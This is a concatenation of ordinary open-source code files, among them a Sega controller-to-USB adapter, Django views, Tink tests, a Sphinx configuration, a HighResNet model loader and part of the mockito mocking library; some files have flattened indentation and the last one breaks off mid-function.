# Wiring Details (uses a 2x5 connector that connects to a 10 pin Ribbon Cable Connector Adapter that presents a DB9 male connector)
#
#|Pico Pin | Pico Signal | 2x5 / DB9 Pin | Sega Signal | Wire Colour |
#|---------|-------------|---------------|--------------|-------------|
#| 40 | VBUS | 5 | +5V | Red |
#| 38 | GND | 5 | GND | Black |
#| 34 | GP28 | 7 | Select | Brown |
#| 32 | GP27 | 1 | Up / Z | Orange |
#| 31 | GP26 | 2 | Down / Y | Yellow |
#| 29 | GP22 | 3 | Left / X | Green |
#| 27 | GP21 | 4 | Right / Mode | Blue |
#| 26 | GP20 | 6 | B / A | Purple |
#| 25 | GP19 | 9 | C / Start | Grey |
import board
import digitalio
import time
import usb_hid
from adafruit_hid import find_device
controllerpins_in = {
"up_z": digitalio.DigitalInOut(board.GP27),
"down_y": digitalio.DigitalInOut(board.GP26),
"left_x": digitalio.DigitalInOut(board.GP22),
"right_mode": digitalio.DigitalInOut(board.GP21),
"a_b": digitalio.DigitalInOut(board.GP20),
"c_start": digitalio.DigitalInOut(board.GP19),
}
controllerpins_out = {"select": digitalio.DigitalInOut(board.GP28)}
# set the state for the input pins and enable built in pullups
for pin, pinio in controllerpins_in.items():
pinio.direction = digitalio.Direction.INPUT
pinio.pull = digitalio.Pull.UP
# set the state for the ouput pins and set the initial state
for pin, pinio in controllerpins_out.items():
pinio.direction = digitalio.Direction.OUTPUT
pinio.value = True
class Stick:
"""Stick
Used to reference the USB HID joystick defined in boot.py and for sending USB reports
"""
def __init__(self, devices):
# Find the stick we defined in boot.py
self._stick_device = find_device(devices, usage_page=0x1, usage=0x04)
self._report = bytearray(3)
def update(self, a,b,c,x,y,z,start,mode,l,r,u,d):
"""update
passed the Sega Genesis/Megadrive Controller State for transmission to the USB Host
returns nothing
"""
# The first byte contains the 8 button states (1 = pressed, 0 = released)
self._report[0] = int(f"{mode:1n}{start:1n}{z:1n}{y:1n}{x:1n}{c:1n}{b:1n}{a:1n}" ,2)
# The second byte contains the x-axis (0 = left, 127 = centre, 255 = right)
self._report[1] = 127
        if l:
            self._report[1] = 0
        if r:
            self._report[1] = 255
        # The third byte contains the y-axis (0 = up, 127 = centre, 255 = down)
        self._report[2] = 127
        if u:
            self._report[2] = 0
        if d:
            self._report[2] = 255
# Transmit the USB update
self._stick_device.send_report(self._report)
def sega():
"""sega
Read the Sega Genesis/Megadrive Controller State and send USB Updates
returns nothing
"""
oldstring = None
while 1:
controller = "-"
button_up = False
button_down = False
button_left = False
button_right = False
button_a = False
button_b = False
button_c = False
button_x = False
button_y = False
button_z = False
button_start = False
button_mode = False
# A detailed description of the controller states are described in https://www.raspberryfield.life/2019/03/25/sega-mega-drive-genesis-6-button-xyz-controller/
# Start State 0
controllerpins_out["select"].value = False
# Start State 1
controllerpins_out["select"].value = True
# Start State 2
controllerpins_out["select"].value = False
# If both left_x and right_mode are LOW then we have a 3 Button Controller
if (
controllerpins_in["left_x"].value == False
and controllerpins_in["right_mode"].value == False
):
controller = 3
if controllerpins_in["a_b"].value == False:
button_a = True
if controllerpins_in["c_start"].value == False:
button_start = True
# Start State 3
controllerpins_out["select"].value = True
if controllerpins_in["up_z"].value == False:
button_up = True
if controllerpins_in["down_y"].value == False:
button_down = True
if controllerpins_in["left_x"].value == False:
button_left = True
if controllerpins_in["right_mode"].value == False:
button_right = True
if controllerpins_in["a_b"].value == False:
button_b = True
if controllerpins_in["c_start"].value == False:
button_c = True
# Start State 4
controllerpins_out["select"].value = False
# If both up_z and down_y are LOW then we have a 6 Button Controller
if (
controllerpins_in["up_z"].value == False
and controllerpins_in["down_y"].value == False
):
controller = 6
# Start State 5 (if controller == 6)
controllerpins_out["select"].value = True
time.sleep(0.001)
if controllerpins_in["right_mode"].value == False:
button_mode = True
if controllerpins_in["up_z"].value == False:
button_z = True
if controllerpins_in["down_y"].value == False:
button_y = True
if controllerpins_in["left_x"].value == False:
button_x = True
# Start State 6 (if controller == 6)
controllerpins_out["select"].value = False
time.sleep(0.001)
# Start State 7 (if controller == 6)
time.sleep(0.001)
controllerpins_out["select"].value = True
newstring = f"{controller}{button_up:1n}{button_down:1n}{button_left:1n}{button_right:1n}{button_start:1n}{button_a:1n}{button_b:1n}{button_c:1n}{button_x:1n}{button_y:1n}{button_z:1n}{button_mode:1n}"
# Only update if something has changed since last time
if newstring != oldstring:
# the following two lines is to help with debugging
# print("TUDLRSABCXYZM")
# print(newstring)
st.update(button_a,button_b,button_c,button_x,button_y,button_z,button_start,button_mode,button_left,button_right,button_up,button_down)
oldstring = newstring
# adding a delay for allowing the controller to reset after state reading
time.sleep(0.03)
if __name__ == "__main__":
time.sleep(1)
try:
st=Stick(usb_hid.devices)
except:
print("Problem with usb_hid.devices")
sega() |
the-stack_106_30557 | # _*_ encoding:utf-8 _*_
from django.shortcuts import render
from django.views.generic import View
from django.http import HttpResponse
import json
from django.contrib.auth.mixins import LoginRequiredMixin
from pure_pagination import Paginator, PageNotAnInteger
from .models import CourseOrg, CityDict, Teacher
from operation.models import UserFavorite
from courses.models import Courses
from .forms import UserAskForm
# Create your views here.
class OrgView(View):
"""
    Course organization list page
"""
def get(self, request):
        # Course organizations
all_orgs = CourseOrg.objects.all()
hot_orgs = all_orgs.order_by("-click_nums")[:3]
        # Cities
all_citys = CityDict.objects.all()
        # Retrieve the selected city filter
city_id = request.GET.get('city', "")
if city_id:
all_orgs = all_orgs.filter(city_id=int(city_id))
        # Filter by category
category = request.GET.get('ct', "")
if category:
all_orgs = all_orgs.filter(category=category)
sort = request.GET.get('sort', "")
if sort:
if sort == "students":
all_orgs = all_orgs.order_by("-students")
elif sort == "courses":
all_orgs = all_orgs.order_by("-course_nums")
org_nums = all_orgs.count()
        # Paginate the course organizations
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_orgs, 5, request=request)
orgs = p.page(page)
return render(request, "org-list.html", {
"all_orgs": orgs,
"all_citys": all_citys,
"org_nums": org_nums,
"city_id": city_id,
"category": category,
"hot_orgs": hot_orgs,
"sort": sort,
})
class AddUserAskView(View):
"""
    User adds a consultation
"""
def post(self, request):
userask_form = UserAskForm(request.POST)
if userask_form.is_valid():
userask_form.save(commit=True)
json_success_data = {'status': 'success'}
return HttpResponse(json.dumps(json_success_data),
content_type="application/json")
else:
            json_fail_data = {'status': 'fail', 'msg': u'Failed to add the consultation'}
return HttpResponse(json.dumps(json_fail_data),
content_type="application/json")
class OrgHomeView(View):
"""
    Organization home page
"""
def get(self, request, org_id):
current_page = "home"
course_org = CourseOrg.objects.get(id=int(org_id))
course_org.click_nums += 1
course_org.save()
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
course_org = CourseOrg.objects.get(id=int(org_id))
all_courses = course_org.courses_set.all()[:3]
all_teachers = course_org.teacher_set.all()[:1]
return render(request, 'org-detail-homepage.html', {
"all_courses": all_courses,
"all_teachers": all_teachers,
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class OrgCourseView(View):
"""
    Organization course list page
"""
def get(self, request, org_id):
current_page = "course"
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
all_courses = course_org.courses_set.all()[:3]
return render(request, 'org-detail-course.html', {
"all_courses": all_courses,
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class OrgDescView(View):
"""
    Organization introduction page
"""
def get(self, request, org_id):
current_page = "desc"
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
return render(request, 'org-detail-desc.html', {
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class OrgTeacherView(View):
"""
    Organization teachers page
"""
def get(self, request, org_id):
current_page = "teacher"
course_org = CourseOrg.objects.get(id=int(org_id))
has_fav = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):
has_fav = True
all_teachers = course_org.teacher_set.all()
return render(request, 'org-detail-teachers.html', {
"all_teachers": all_teachers,
"course_org": course_org,
"current_page": current_page,
'has_fav': has_fav,
})
class AddFavView(View):
"""
    Add a user favorite or cancel an existing one
"""
def post(self, request):
        # fav_id and fav_type are passed in by the Ajax request from org_base.html
fav_id = request.POST.get('fav_id', 0)
fav_type = request.POST.get('fav_type', 0)
        # Check whether the user is logged in
if not request.user.is_authenticated():
            json_fail_data_notlogin = {'status': 'fail', 'msg': 'User is not logged in'}
return HttpResponse(json.dumps(json_fail_data_notlogin),
content_type="application/json")
exist_records = UserFavorite.objects.filter(user=request.user,
fav_id=int(fav_id), fav_type=int(fav_type))
if exist_records:
            # If the record already exists, the user is cancelling the favorite
exist_records.delete()
if int(fav_type) == 1:
course = Courses.objects.get(id=int(fav_id))
course.fav_nums -= 1
if course.fav_nums < 0:
course.fav_nums = 0
course.save()
elif int(fav_type) == 2:
course_org = CourseOrg.objects.get(id=int(fav_id))
course_org.fav_nums -= 1
if course_org.fav_nums < 0:
course_org.fav_nums = 0
course_org.save()
elif int(fav_type) == 3:
teacher = Teacher.objects.get(id=int(fav_id))
teacher.fav_nums -= 1
if teacher.fav_nums < 0:
teacher.fav_nums = 0
teacher.save()
            json_success_data_cancelfav = {'status': 'success', 'msg': 'Favorite'}
return HttpResponse(json.dumps(json_success_data_cancelfav), content_type="application/json")
else:
user_fav = UserFavorite()
if int(fav_id) > 0 and int(fav_type) > 0:
user_fav.user = request.user
user_fav.fav_id = int(fav_id)
user_fav.fav_type = int(fav_type)
user_fav.save()
if int(fav_type) == 1:
course = Courses.objects.get(id=int(fav_id))
course.fav_nums += 1
course.save()
elif int(fav_type) == 2:
course_org = CourseOrg.objects.get(id=int(fav_id))
course_org.fav_nums += 1
course_org.save()
elif int(fav_type) == 3:
teacher = Teacher.objects.get(id=int(fav_id))
teacher.fav_nums += 1
teacher.save()
                json_success_data = {'status': 'success', 'msg': 'Favorited'}
return HttpResponse(json.dumps(json_success_data), content_type="application/json")
else:
                json_fail_data_error = {'status': 'fail', 'msg': 'Failed to favorite'}
return HttpResponse(json.dumps(json_fail_data_error), content_type="application/json")
class TeacherListView(View):
"""
    Course lecturer list page
"""
def get(self, request):
all_teachers = Teacher.objects.all()
sort = request.GET.get('sort', "")
if sort:
if sort == "hot":
all_teachers = all_teachers.order_by("-click_nums")
        # Lecturer ranking
sorted_teacher = Teacher.objects.all().order_by("-click_nums")[:3]
teacher_nums = all_teachers.count()
        # Paginate the lecturers
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
p = Paginator(all_teachers, 5, request=request)
teachers = p.page(page)
return render(request, "teachers-list.html", {
"all_teachers": teachers,
"sort": sort,
"sorted_teacher": sorted_teacher,
"teacher_nums": teacher_nums,
})
class TeacherDetailView(View):
def get(self, request, teacher_id):
teacher = Teacher.objects.get(id=int(teacher_id))
teacher.click_nums += 1
teacher.save()
all_courses = Courses.objects.filter(teacher=teacher)
has_teacher_faved = False
has_org_faved = False
if request.user.is_authenticated():
if UserFavorite.objects.filter(user=request.user, fav_type=3, fav_id=int(teacher.id)):
has_teacher_faved = True
if UserFavorite.objects.filter(user=request.user, fav_type=2, fav_id=int(teacher.org.id)):
has_org_faved = True
        # Lecturer ranking
sorted_teacher = Teacher.objects.all().order_by("-click_nums")[:3]
return render(request, "teacher-detail.html",{
"teacher": teacher,
"all_courses": all_courses,
"sorted_teacher": sorted_teacher,
"has_teacher_faved": has_teacher_faved,
"has_org_faved": has_org_faved,
}) |
the-stack_106_30559 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tink.tools.testing.cross_language.util.tinkey_cli."""
from absl.testing import absltest
from absl.testing import parameterized
from tools.testing.cross_language.util import cli_aead
from tools.testing.cross_language.util import cli_daead
from tools.testing.cross_language.util import cli_hybrid
from tools.testing.cross_language.util import cli_mac
from tools.testing.cross_language.util import cli_tinkey
class TinkeyCliWrapperTest(parameterized.TestCase):
@parameterized.parameters(*cli_tinkey.AEAD_KEY_TEMPLATES)
def test_generate_encrypt_decrypt(self, key_template):
keyset_handle = cli_tinkey.generate_keyset_handle(key_template)
primitive = cli_aead.CliAead('java', keyset_handle)
plaintext = b'plaintext'
associated_data = b'associated_data'
ciphertext = primitive.encrypt(plaintext, associated_data)
output = primitive.decrypt(ciphertext, associated_data)
self.assertEqual(output, plaintext)
def test_generate_encrypt_decrypt_deterministically(self):
keyset_handle = cli_tinkey.generate_keyset_handle(
cli_tinkey.DAEAD_KEY_TEMPLATE)
p = cli_daead.CliDeterministicAead('java', keyset_handle)
plaintext = b'plaintext'
associated_data = b'associated_data'
ciphertext = p.encrypt_deterministically(plaintext, associated_data)
output = p.decrypt_deterministically(ciphertext, associated_data)
self.assertEqual(output, plaintext)
@parameterized.parameters(*cli_tinkey.MAC_KEY_TEMPLATES)
def test_mac_generate_compute_verify(self, key_template):
keyset_handle = cli_tinkey.generate_keyset_handle(key_template)
p = cli_mac.CliMac('java', keyset_handle)
data = b'data'
mac_value = p.compute_mac(data)
self.assertIsNone(p.verify_mac(mac_value, data))
@parameterized.parameters(*cli_tinkey.HYBRID_KEY_TEMPLATES)
def test_hybrid_generate_encrypt_decrypt(self, key_template):
private_handle = cli_tinkey.generate_keyset_handle(key_template)
public_handle = cli_tinkey.public_keyset_handle(private_handle)
enc = cli_hybrid.CliHybridEncrypt('java', public_handle)
dec = cli_hybrid.CliHybridDecrypt('java', private_handle)
plaintext = b'plaintext'
context_info = b'context_info'
ciphertext = enc.encrypt(plaintext, context_info)
output = dec.decrypt(ciphertext, context_info)
self.assertEqual(output, plaintext)
if __name__ == '__main__':
absltest.main()
|
the-stack_106_30562 | import os
import re
import subprocess
import sys
from datetime import date
from pathlib import Path
from docutils import nodes
from sphinx import addnodes
from sphinx.util import logging
import tox
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.extlinks",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
"sphinxcontrib.autoprogram",
]
ROOT_SRC_TREE_DIR = Path(__file__).parents[1]
def generate_draft_news():
home = "https://github.com"
issue = f"{home}/issue"
fragments_path = ROOT_SRC_TREE_DIR / "docs" / "changelog"
for pattern, replacement in (
(r"[^`]@([^,\s]+)", rf"`@\1 <{home}/\1>`_"),
(r"[^`]#([\d]+)", rf"`#pr\1 <{issue}/\1>`_"),
):
for path in fragments_path.glob("*.rst"):
path.write_text(re.sub(pattern, replacement, path.read_text()))
env = os.environ.copy()
env["PATH"] += os.pathsep.join(
[os.path.dirname(sys.executable)] + env["PATH"].split(os.pathsep),
)
changelog = subprocess.check_output(
["towncrier", "--draft", "--version", "DRAFT"],
cwd=str(ROOT_SRC_TREE_DIR),
env=env,
).decode("utf-8")
if "No significant changes" in changelog:
content = ""
else:
note = "*Changes in master, but not released yet are under the draft section*."
content = f"{note}\n\n{changelog}"
(ROOT_SRC_TREE_DIR / "docs" / "_draft.rst").write_text(content)
generate_draft_news()
project = "tox"
_full_version = tox.__version__
release = _full_version.split("+", 1)[0]
version = ".".join(release.split(".")[:2])
author = "holger krekel and others"
year = date.today().year
copyright = f"2010-{year}, {author}"
master_doc = "index"
source_suffix = ".rst"
exclude_patterns = ["changelog/*"]
templates_path = ["_templates"]
pygments_style = "sphinx"
html_theme = "alabaster"
html_theme_options = {
"logo": "img/tox.png",
"github_user": "tox-dev",
"github_repo": "tox",
"description": "standardise testing in Python",
"github_banner": "true",
"github_type": "star",
"travis_button": "false",
"badge_branch": "master",
"fixed_sidebar": "false",
}
html_sidebars = {
"**": ["about.html", "localtoc.html", "relations.html", "searchbox.html", "donate.html"],
}
html_favicon = "_static/img/toxfavi.ico"
html_show_sourcelink = False
html_static_path = ["_static"]
htmlhelp_basename = f"{project}doc"
latex_documents = [("index", "tox.tex", f"{project} Documentation", author, "manual")]
man_pages = [("index", project, f"{project} Documentation", [author], 1)]
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
suppress_warnings = ["epub.unknown_project_files"] # Prevent barking at `.ico`
intersphinx_mapping = {"https://docs.python.org/": None}
def setup(app):
def parse_node(env, text, node):
args = text.split("^")
name = args[0].strip()
node += addnodes.literal_strong(name, name)
if len(args) > 2:
default = f"={args[2].strip()}"
node += nodes.literal(text=default)
if len(args) > 1:
content = f"({args[1].strip()})"
node += addnodes.compact_paragraph(text=content)
return name # this will be the link
app.add_object_type(
directivename="conf",
rolename="conf",
objname="configuration value",
indextemplate="pair: %s; configuration value",
parse_node=parse_node,
)
tls_cacerts = os.getenv("SSL_CERT_FILE") # we don't care here about the validity of certificates
linkcheck_timeout = 30
linkcheck_ignore = [r"https://holgerkrekel.net"]
extlinks = {
"issue": ("https://github.com/tox-dev/tox/issues/%s", "#"),
"pull": ("https://github.com/tox-dev/tox/pull/%s", "p"),
"user": ("https://github.com/%s", "@"),
}
nitpicky = True
nitpick_ignore = [
("py:class", "tox.interpreters.InterpreterInfo"),
]
# workaround for https://github.com/sphinx-doc/sphinx/issues/10112
logging.getLogger("sphinx.ext.extlinks").setLevel(40)
language = 'zh_CN'
gettext_compact = False
locale_dirs = ['../locales/'] |
the-stack_106_30563 | """SCons.Tool.Packaging.tarbz2
The tarbz2 SRC packager.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
from SCons.Tool.packaging import putintopackageroot
def package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Tar']
bld.set_suffix('.tar.bz2')
target, source = putintopackageroot(target, source, env, PACKAGEROOT, honor_install_location=0)
return bld(env, target, source, TARFLAGS='-jc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_106_30564 | # Karen Byrne 29th April 2018
#https://stackoverflow.com/questions/45862223/use-different-colors-in-scatterplot-for-iris-dataset?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
# I found this code which returns a scatter plot showing the clusters in the data
# I could not get the file to run correctly in time for the deadline but it is something to work from
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
# sns.load_dataset() expects the name of a built-in example dataset (e.g. "iris"),
# not a file path, so read the local CSV with pandas instead (assuming it has the
# same sepal_length/sepal_width/species columns as the seaborn iris dataset).
iris = pd.read_csv("data/iristest.csv")
ratio = iris["sepal_length"]/iris["sepal_width"]
for name, group in iris.groupby("species"):
plt.scatter(group.index, ratio[group.index], label=name)
plt.legend()
plt.show()
|
the-stack_106_30565 | from contextlib import contextmanager
from itertools import chain
from rdflib.graph import (
ReadOnlyGraphAggregate, Dataset, Graph, ConjunctiveGraph)
from rdflib.paths import Path
from .globals import _dataset_ctx_stack
class DatasetGraphAggregation(ReadOnlyGraphAggregate):
def __init__(self, graphs, store='default'):
if store is not None:
super(ReadOnlyGraphAggregate, self).__init__(store)
Graph.__init__(self, store)
self.__namespace_manager = None
self.graphs = graphs
    def triples(self, spo_triple):
        (s, p, o) = spo_triple
graphs = chain(*(g.contexts() if isinstance(g, Dataset)
else (g,) for g in self.graphs))
for graph in graphs:
if isinstance(p, Path):
for s, o in p.eval(self, s, o):
yield s, p, o
else:
for s1, p1, o1 in graph.triples((s, p, o)):
yield (s1, p1, o1)
class GraphGetter(object):
def __init__(self, ds=None):
self.ds = ds
self.map = {}
self.aggregation = DatasetGraphAggregation(self.map.values())
def __get__(self, instance, owner):
if instance is None:
return self
        if 'g' not in instance.__dict__:
instance.g = GraphGetter(ds=instance)
return instance.g
def __getitem__(self, name):
if name is None:
return self.ds.graph()
return self.map[name]
def __setitem__(self, name, identifier):
self.map[name] = self.ds.graph(identifier)
return self.map[name]
def _push_dataset_ctx(**graph_descriptors):
ds = NamedContextDataset()
ds.g['pool'] = Dataset()
for name, descriptor in graph_descriptors.items():
if set(descriptor).intersection(set(('data', 'file', 'source'))):
ds.g[name] = ds.parse(**descriptor)
for ns in ds.g[name].namespaces():
ds.bind(*ns)
else:
ds.g[name] = ConjunctiveGraph()
_dataset_ctx_stack.push(ds)
return ds
def _pop_dataset_ctx():
_dataset_ctx_stack.pop()
class NamedContextDataset(Dataset):
g = GraphGetter()
@contextmanager
def context(**graph_descriptors):
try:
yield _push_dataset_ctx(**graph_descriptors)
finally:
_pop_dataset_ctx()
|
the-stack_106_30566 | import torch
dependencies = ['torch']
def highres2dnet(*args, **kwargs):
"""
HighRes2DNet in the style of
HighRes3DNet by Li et al. 2017 for T1-MRI brain parcellation
"""
from highresnet import HighRes2DNet
model = HighRes2DNet(*args, **kwargs)
return model
def highres3dnet(*args, pretrained=False, **kwargs):
"""
HighRes3DNet by Li et al. 2017 for T1-MRI brain parcellation
pretrained (bool): load parameters from pretrained model
"""
from highresnet import HighRes3DNet
if pretrained:
model = HighRes3DNet(
*args,
in_channels=1,
out_channels=160,
add_dropout_layer=True,
**kwargs,
)
url_dir = 'https://github.com/fepegar/highresnet/raw/master'
url = '{}/highres3dnet_li_parameters-7d297872.pth'.format(url_dir)
state_dict = torch.hub.load_state_dict_from_url(
url, progress=False, map_location='cpu')
model.load_state_dict(state_dict)
else:
model = HighRes3DNet(*args, **kwargs)
return model
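# Usage sketch: if this file serves as the hubconf.py of the fepegar/highresnet
# repository, the entrypoints above can be loaded through torch.hub; the input
# below is an arbitrary random patch, only meant to illustrate tensor shapes.
if __name__ == '__main__':
    net = torch.hub.load('fepegar/highresnet', 'highres3dnet', pretrained=True)
    net.eval()
    patch = torch.rand(1, 1, 32, 32, 32)  # (batch, channels, depth, height, width)
    with torch.no_grad():
        logits = net(patch)
    print(logits.shape)  # e.g. torch.Size([1, 160, 32, 32, 32])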
|
the-stack_106_30567 | import numpy
import sys
from Algorithms.Logistic.Executor.logistic_executor import LogisticExecutor
from Utils.conjugate_gradient_method import conjugate_solver
home_dir = '../../../'
sys.path.append(home_dir)
eta_list = [1, 0.1, 0.001, 0.0001, 0.000001]
class DANELogisticExecutor(LogisticExecutor):
def __init__(self, x_mat, y_vec):
super().__init__(x_mat, y_vec)
self.global_gradient = numpy.zeros((self.d, 1))
def update_global_gradient(self, g):
self.global_gradient = g
def set_w(self, w):
self.w = w
def compute_gradient_for_w(self, w_vec):
z_vec = numpy.dot(self.x_mat, w_vec)
z_vec = numpy.multiply(z_vec, self.y_vec)
exp_z_vec = numpy.exp(z_vec)
vec_for_grad = numpy.multiply(-1 / (1 + exp_z_vec), self.y_vec)
grad_term = numpy.dot(self.x_mat.T, vec_for_grad)
return grad_term / self.s + self.gamma * w_vec
def compute_batch_gradient(self, x_blk, y_blk, batch_size, w):
z_vec = numpy.dot(x_blk, w)
z_vec = numpy.multiply(z_vec, y_blk)
exp_z_vec = numpy.exp(z_vec)
vec_for_gradient = numpy.multiply(-1 / (1 + exp_z_vec), y_blk)
gradient_term = numpy.dot(x_blk.T, vec_for_gradient)
return gradient_term / batch_size + self.gamma * w
def objective_function_for_local_prob(self, h_vec, alpha, mu):
first_term = self.objective_function(self.w + h_vec)
second_term = numpy.sum(numpy.dot((self.g - alpha * self.global_gradient).T, h_vec))
return first_term - second_term + mu / 2 * numpy.linalg.norm(h_vec) ** 2
def gradient_descent_solver(self, alpha=1, rho=0.5, beta=0.2, mu=0.001, max_iter=50):
"""
solve min f_i(w_t + h) - (g_i(w_t) - alpha * g(w_t)).T * h
"""
a = alpha
h_vec = numpy.zeros((self.d, 1))
for i in range(max_iter):
grad = self.compute_gradient_for_w(self.w + h_vec) - (
self.compute_gradient_for_w(self.w) - alpha * self.global_gradient) + mu * h_vec
eta = 0
for j in range(len(eta_list)):
eta = eta_list[j]
objective_val_old = self.objective_function_for_local_prob(h_vec, eta, mu)
if self.objective_function_for_local_prob(h_vec - eta_list[j] * grad, eta, mu) < objective_val_old - \
eta_list[j] * beta * numpy.linalg.norm(grad) ** 2:
break
h_vec = numpy.subtract(h_vec, eta * grad)
return h_vec
def svrg_solver(self, max_iter=10, alpha=0.0000001):
batch_size = int(numpy.ceil(self.s / max_iter))
w = numpy.zeros((self.d, 1))
for i in range(max_iter):
w_tilde = numpy.copy(w)
for j in range(max_iter):
idx = numpy.random.choice(self.s, batch_size)
rand_x_blk = self.x_mat[idx, :]
rand_y_blk = self.y_vec[idx]
objective_value_old = 1e10
w_vec = numpy.zeros((self.d, 1))
for eta in eta_list:
full_gradient = self.compute_gradient_for_w(w_tilde) - self.compute_gradient_for_w(
self.w) + eta * self.global_gradient + alpha * (w - self.w)
batch_gradient = self.compute_batch_gradient(rand_x_blk, rand_y_blk, batch_size,
w) - self.compute_batch_gradient(rand_x_blk,
rand_y_blk,
batch_size,
w_tilde) + full_gradient
w_new = w - eta * batch_gradient
objective_value_new = self.objective_function(w_new)
if objective_value_new < objective_value_old:
objective_value_old = objective_value_new
w_vec = w_new
w = w_vec
return w
def compute_local_statistics_with_info(self, v):
v_exp = 0
for i in range(self.d):
v_exp += v[i]
v_exp /= self.d
v_var = 0
for i in range(self.d):
v_var += (v[i] - v_exp) ** 2
v_var /= self.d
return v_exp, v_var
|
the-stack_106_30568 | # Copyright (c) 2008-2016 Szczepan Faber, Serhiy Oplakanets, Herr Kaste
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import functools
import inspect
import operator
from collections import deque
from . import invocation, signature, utils
from .mock_registry import mock_registry
__all__ = ['mock']
__tracebackhide__ = operator.methodcaller(
"errisinstance",
invocation.InvocationError
)
MYPY = False
if MYPY:
from typing import Deque, Union
RealInvocation = Union[
invocation.RememberedInvocation,
invocation.RememberedProxyInvocation
]
class _Dummy(object):
# We spell out `__call__` here for convenience. All other magic methods
# must be configured before use, but we want `mock`s to be callable by
# default.
def __call__(self, *args, **kwargs):
return self.__getattr__('__call__')(*args, **kwargs) # type: ignore[attr-defined] # noqa: E501
def remembered_invocation_builder(mock, method_name, *args, **kwargs):
invoc = invocation.RememberedInvocation(mock, method_name)
return invoc(*args, **kwargs)
class Mock(object):
def __init__(self, mocked_obj, strict=True, spec=None):
self.mocked_obj = mocked_obj
self.strict = strict
self.spec = spec
self.invocations = deque() # type: Deque[RealInvocation]
self.stubbed_invocations = deque() \
# type: Deque[invocation.StubbedInvocation]
self.original_methods = {}
self._signatures_store = {}
def remember(self, invocation):
self.invocations.appendleft(invocation)
def finish_stubbing(self, stubbed_invocation):
self.stubbed_invocations.appendleft(stubbed_invocation)
def clear_invocations(self):
self.invocations = deque()
# STUBBING
def get_original_method(self, method_name):
"""
Looks up the original method on the `spec` object and returns it
together with an indication of whether the method is found
"directly" on the `spec` object.
This is used to decide whether the method should be stored as an
original_method and should therefore be replaced when unstubbing.
"""
if self.spec is None:
return None, False
try:
return self.spec.__dict__[method_name], True
except (AttributeError, KeyError):
# Classes with defined `__slots__` and then no `__dict__` are not
# patchable but if we catch the `AttributeError` here, we get
# the better error message for the user.
return getattr(self.spec, method_name, None), False
def set_method(self, method_name, new_method):
setattr(self.mocked_obj, method_name, new_method)
def replace_method(self, method_name, original_method):
def new_mocked_method(*args, **kwargs):
# we throw away the first argument, if it's either self or cls
if (
inspect.ismethod(new_mocked_method)
or inspect.isclass(self.mocked_obj)
and not isinstance(new_mocked_method, staticmethod)
):
args = args[1:]
return remembered_invocation_builder(
self, method_name, *args, **kwargs)
new_mocked_method.__name__ = method_name
if original_method:
new_mocked_method.__doc__ = original_method.__doc__
